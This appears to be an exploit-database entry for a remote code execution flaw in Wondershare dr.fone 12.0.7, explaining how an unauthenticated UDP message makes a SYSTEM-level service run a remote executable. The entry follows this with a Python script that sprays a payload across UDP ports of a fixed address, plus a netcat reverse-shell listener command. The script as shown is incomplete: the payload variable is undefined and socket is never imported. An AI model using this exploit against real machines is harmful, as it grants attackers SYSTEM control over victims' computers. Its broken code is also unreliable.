Exploits / Vulnerability Discovered : 2022-05-11 |
Type : remote |
Platform : windows
This exploit / vulnerability Wondershare dr.fone 12.0.7 remote code execution (rce) is for educational purposes only and if it is used you will do on your own risk!
Wondershare LTD Dr. Fone as of 2021-12-06 version is affected by Remote code execution. Due to software design flaws an unauthenticated user can communicate over UDP with the "InstallAssistService.exe" service(the service is running under SYSTEM privileges) and manipulate it to execute malicious executable without any validation from a remote location and gain SYSTEM privileges
#!/usr/bin/python3
# stty raw -echo; (stty size; cat) | nc -lvnp 1337
for i in range(1024,65500):
opened_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
opened_socket.sendto(byte_message, ("192.168.14.137", i))
print(f"Trying port {i}",end="\r")